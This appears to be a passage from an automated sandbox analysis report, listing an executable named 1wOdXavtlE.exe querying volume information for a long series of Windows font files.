Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\1wOdXavtlE.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
